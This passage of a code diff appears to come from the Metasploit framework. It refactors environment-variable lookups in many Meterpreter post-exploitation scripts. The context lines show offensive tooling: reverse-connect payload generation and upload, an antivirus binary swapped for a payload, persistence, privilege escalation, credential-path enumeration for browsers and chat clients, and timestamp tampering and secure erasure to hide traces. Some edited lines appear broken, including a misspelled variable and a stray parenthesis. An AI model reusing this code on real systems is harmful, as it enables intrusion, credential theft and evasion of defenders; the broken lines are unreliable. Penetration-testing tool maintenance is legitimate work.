   #Function to overwrite the file
   def file_overwrite(file,type,n)
     #FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
-    r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
+    r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
     handle=r['return']
     real_size=size_on_disk(file)
 
@@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
       end
 
       #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
-      client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
+      session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
 
       #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
-      w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
+      w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
 
       if w['return']==false
         print_error("The was an error writing to disk, check permissions")
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
       print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
     end
 
-    client.railgun.kernel32.CloseHandle(handle)
+    session.railgun.kernel32.CloseHandle(handle)
     change_mace(file)
 
     #Generate a long random file name before delete it
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
     print_status("Changing file name")
 
     #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
-    client.railgun.kernel32.MoveFileA(file,newname)
+    session.railgun.kernel32.MoveFileA(file,newname)
 
     file_rm(newname)
     print_good("File erased!")
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
   #Check if the file is encrypted or compressed
   def comp_encr(file)
     #http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
-    handle=client.railgun.kernel32.GetFileAttributesA(file)
+    handle=session.railgun.kernel32.GetFileAttributesA(file)
     type= handle['return']
 
     #FILE_ATTRIBUTE_COMPRESSED=0x800

scripts/meterpreter/dumplinks.rb

@@ -61,7 +61,7 @@ def enum_users(os)
   user = @client.sys.config.getuid
   userpath = nil
   useroffcpath = nil
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
   if os =~ /Windows 7|Vista|2008/
     userpath = sysdrv + "\\Users\\"
     lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@@ -83,7 +83,7 @@ def enum_users(os)
       users << userinfo
     end
   else
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userpath'] = userpath + uservar + lnkpath
     userinfo['useroffcpath'] = userpath + uservar + officelnkpath

scripts/meterpreter/duplicate.rb

@@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
     #
     # Upload to the filesystem
     #
-    tempdir = client.fs.file.expand_path("%TEMP%")
+    tempdir = client.sys.config.getenv('TEMP')
     tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
     tempexe.gsub!("\\\\", "\\")
 

scripts/meterpreter/enum_chrome.rb

@@ -195,7 +195,7 @@ host = session.session_host
 @log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
 ::FileUtils.mkdir_p(@log_dir)
 
-sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
+sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
 os = @host_info['OS']
 if os =~ /(Windows 7|2008|Vista)/
   @profiles_path = sysdrive + "\\Users\\"
@@ -218,7 +218,7 @@ if is_system?
   print_status "users found: #{usernames.join(", ")}"
 else
   print_status "running as user '#{uid}'..."
-  usernames << client.fs.file.expand_path("%USERNAME%")
+  usernames << client.sys.config.getenv('USERNAME')
   prepare_railgun
 end
 

scripts/meterpreter/enum_firefox.rb

@@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
   if frfxchk
     user = @client.sys.config.getuid
     if not is_system?
-      usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
+      envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
-      db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
+      usrname = envs['USERNAME']
+      db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
       if kill_frfx
         kill_firefox
       end

scripts/meterpreter/enum_powershell_env.rb

@@ -22,7 +22,7 @@ def enum_users
   users = []
   user = @client.sys.config.getuid
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /Windows 7|Vista|2008/
     path4users = sysdrv + "\\Users\\"
@@ -43,7 +43,7 @@ def enum_users
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + profilepath
     users << userinfo
@@ -83,7 +83,7 @@ def enum_powershell
     end
     if powershell_version =~ /2./
       print_status("Powershell Modules:")
-      powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
+      powershell_module_path = @client.sys.config.getenv('PSModulePath')
       @client.fs.dir.foreach(powershell_module_path) do |m|
         next if m =~ /^(\.|\.\.)$/
         print_status("\t#{m}")

scripts/meterpreter/enum_vmware.rb

@@ -223,7 +223,7 @@ def enum_users
   users = []
   user = @client.sys.config.getuid
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -244,7 +244,7 @@ def enum_users
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + profilepath
     users << userinfo

scripts/meterpreter/get_env.rb

@@ -18,13 +18,12 @@ def list_env_vars(var_names)
           "Name",
           "Value"
         ])
-  var_names.flatten.each do |v|
+  @client.sys.config.getenvs(*var_names.flatten).each do |k, v|
-    tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
+    tbl << [k, v]
   end
   print("\n" + tbl.to_s + "\n")
 end
 
-
 opts.parse(args) { |opt, idx, val|
   case opt
   when "-h"

scripts/meterpreter/get_filezilla_creds.rb

@@ -114,7 +114,7 @@ def enum_users(os)
   users = []
 
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -135,7 +135,7 @@ def enum_users(os)
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + path2purple
     users << userinfo

scripts/meterpreter/get_pidgin_creds.rb

@@ -145,7 +145,7 @@ def enum_users(os)
   users = []
 
   path4users = ""
-  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+  sysdrv = @client.sys.config.getenv('SystemDrive')
 
   if os =~ /Windows 7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -166,7 +166,7 @@ def enum_users(os)
     end
   else
     userinfo = {}
-    uservar = @client.fs.file.expand_path("%USERNAME%")
+    uservar = @client.sys.config.getenv('USERNAME')
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + path2purple
     users << userinfo

scripts/meterpreter/getcountermeasure.rb

@@ -301,7 +301,7 @@ def checkdep(session)
   tmpout = ""
   depmode = ""
   # Expand environment %TEMP% variable
-  tmp = session.fs.file.expand_path("%TEMP%")
+  tmp = session.sys.config.getenv('TEMP')
   # Create random name for the wmic output
   wmicfile = sprintf("%.5d",rand(100000))
   wmicout = "#{tmp}\\#{wmicfile}"

scripts/meterpreter/hostsedit.rb

@@ -30,7 +30,7 @@ end
 
 record = ""
 #Set path to the hosts file
-hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
+hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
 #Function check if UAC is enabled
 def checkuac(session)
   winver = session.sys.config.sysinfo

scripts/meterpreter/panda_2007_pavsrv51.rb

@@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
       exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
       # Change to our working directory.
-      workingdir = client.fs.file.expand_path("%ProgramFiles%")
+      workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
-      client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
+      client.fs.dir.chdir(workindir)
 
       # Create a backup of the original exe.
       print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
       client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
 
       # Place our newly created exe with the orginal binary name.
-      tempdir = client.fs.file.expand_path("%ProgramFiles%")
+      tempexe = workingdir + "PAVSRV51.EXE"
-      tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
 
       print_status("Sending EXE payload '#{tempexe}'.")
       fd = client.fs.file.new(tempexe, "wb")

scripts/meterpreter/persistence.rb

@@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
   if target_dir
     tempdir = target_dir
   else
-    tempdir = @client.fs.file.expand_path("%TEMP%")
+    tempdir = @client.sys.config.getenv('TEMP')
   end
   tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
   fd = @client.fs.file.new(tempvbs, "wb")

scripts/meterpreter/pml_driver_config.rb

@@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
       exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
       # Place our newly created exe in %TEMP%
-      tempdir = client.fs.file.expand_path("%TEMP%")
+      tempdir = client.sys.config.getenv('TEMP')
       tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
       print_status("Sending EXE payload '#{tempexe}'.")
       fd = client.fs.file.new(tempexe, "wb")

scripts/meterpreter/prefetchtool.rb

@@ -19,7 +19,7 @@ require 'digest/sha1'
   "-l" => [ false,  "Download Prefetch Folder Analysis Log"]
 )
 
-@tempdir = @session.fs.file.expand_path("%TEMP%")
+@tempdir = @session.sys.config.getenv('TEMP')
 
 #---------------------------------------------------------------------------------------------------------
 def read_program_list

scripts/meterpreter/remotewinenum.rb

@@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
   runfail = 0
   runningas = session.sys.config.getuid
   begin
-    tmp = session.fs.file.expand_path("%TEMP%")
+    tmp = session.sys.config.getenv('TEMP')
     # Temporary file on windows host to store results
     wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
 

scripts/meterpreter/scheduleme.rb

@@ -179,7 +179,7 @@ end
 #---------------------------------------------------------------------------------------------------------
 
 def upload(session,file)
-  location = session.fs.file.expand_path("%TEMP%")
+  location = session.sys.config.getenv('TEMP')
   fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
   print_status("Uploading #{file}....")
   session.fs.file.upload_file("#{fileontrgt}","#{file}")

scripts/meterpreter/schelevator.rb

@@ -99,6 +99,10 @@ upload_fn = nil
   end
 }
 
+envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
+sysdir = envs['SystemRoot']
+tmpdir = envs['TEMP']
+
 # Must have at least one of -c or -u
 if not cmd and not upload_fn
   print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@@ -110,9 +114,8 @@ if not cmd and not upload_fn
   raw  = pay.generate
   exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
   #and placing it on the target in %TEMP%
-  tempdir = client.fs.file.expand_path("%TEMP%")
   tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
-  cmd = tempdir + "\\" + tempexename + ".exe"
+  cmd = tmpdir + "\\" + tempexename + ".exe"
   print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
   fd = client.fs.file.new(cmd, "wb")
   fd.write(exe)
@@ -139,8 +142,6 @@ end
 #
 # Upload the payload command if needed
 #
-sysdir = session.fs.file.expand_path("%SystemRoot%")
-tmpdir = session.fs.file.expand_path("%TEMP%")
 if upload_fn
   begin
     location = tmpdir.dup

scripts/meterpreter/scraper.rb

@@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" +
 unsupported if client.platform !~ /win32|win64/i
 begin
 
-  tmp = client.fs.file.expand_path("%TEMP%")
+  tmp = client.sys.config.getenv('TEMP')
 
   print_status("Gathering basic system information...")
 

scripts/meterpreter/service_permissions_escalate.rb

@@ -51,6 +51,10 @@ opts.parse(args) do |opt, idx, val|
   end
 end
 
+envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
+tempdir = envs['TEMP']
+sysdir = envs['SYSTEMROOT']
+
 # Get the exe payload.
 pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
 pay.datastore['LHOST'] = rhost
@@ -58,9 +62,8 @@ pay.datastore['LPORT'] = rport
 raw  = pay.generate
 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 #and placing it on the target in %TEMP%
-tempdir = client.fs.file.expand_path("%TEMP%")
 tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = tempdir + "\\" + tempexename + ".exe"
+tempexe = "#{tempdir}\\#{tempexename}.exe"
 print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
 fd = client.fs.file.new(tempexe, "wb")
 fd.write(exe)
@@ -129,7 +132,7 @@ service_list.each do |serv|
     moved = false
     configed = false
     #default path, but there should be an ImagePath registry key
-    source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
+    source = "#{sysdir}\\system32\\#{serv}.exe")
     #get path to exe; parse out quotes and arguments
     sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
     sourcemaybe = client.fs.file.expand_path(sourceorig)

scripts/meterpreter/srt_webdrive_priv.rb

@@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m|
     exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
     # Place our newly created exe in %TEMP%
-    tempdir = client.fs.file.expand_path("%TEMP%")
+    tempdir = client.sys.config.getenv('TEMP')
     tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
     print_status("Sending EXE payload '#{tempexe}'.")
     fd = client.fs.file.new(tempexe, "wb")

scripts/meterpreter/uploadexec.rb

@@ -23,7 +23,7 @@ def upload(session,file,trgloc = "")
     raise "File to Upload does not exists!"
   else
     if trgloc == ""
-    location = session.fs.file.expand_path("%TEMP%")
+    location = session.sys.config.getenv('TEMP')
     else
       location = trgloc
     end

scripts/meterpreter/virusscan_bypass.rb

@@ -32,7 +32,7 @@ def upload(session,file,trgloc)
   if not ::File.exists?(file)
     raise "File to Upload does not exists!"
   else
-    @location = session.fs.file.expand_path("%TEMP%")
+    @location = session.sys.config.getenv('TEMP')
     begin
       ext = file.scan(/\S*(.exe)/i)
       if ext.join == ".exe"

scripts/meterpreter/vnc.rb

@@ -152,7 +152,7 @@ else
   #
   # Upload to the filesystem
   #
-  tempdir = client.fs.file.expand_path("%TEMP%")
+  tempdir = client.sys.config.getenv('TEMP')
   tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
   tempexe.gsub!("\\\\", "\\")
 

scripts/meterpreter/win32-sshclient.rb

@@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil)
     raise "File to Upload does not exists!"
   else
     if trgloc == nil
-      location = client.fs.file.expand_path("%TEMP%")
+      location = client.sys.config.getenv('TEMP')
     else
       location = trgloc
     end

scripts/meterpreter/winenum.rb

@@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil)
   @client.response_timeout=120
 
   begin
-    tmp = @client.fs.file.expand_path("%TEMP%")
+    tmp = @client.sys.config.getenv('TEMP')
 
     wmiccmds.each do |wmi|
       if i < 10
@@ -409,7 +409,7 @@ end
 def chmace(cmds)
   windir = ''
   print_status("Changing Access Time, Modified Time and Created Time of Files Used")
-  windir = @client.fs.file.expand_path("%WinDir%")
+  windir = @client.sys.config.getenv('WinDir')
   cmds.each do |c|
     begin
       @client.core.use("priv")
@@ -430,7 +430,7 @@ def regdump(pathoflogs,filename)
   #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
   garbage = ''
   hives = %w{HKCU HKLM HKCC HKCR HKU}
-  windir = @client.fs.file.expand_path("%WinDir%")
+  windir = @client.sys.config.getenv('WinDir')
   print_status('Dumping and Downloading the Registry')
   hives.each do |hive|
     begin

scripts/meterpreter/wmic.rb

@@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil)
   tmpout = ''
   session.response_timeout=120
   begin
-    tmp = session.fs.file.expand_path("%TEMP%")
+    tmp = session.sys.config.getenv('TEMP')
     wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
     wmiccmds.each do |wmi|
       print_status "running command wmic #{wmi}"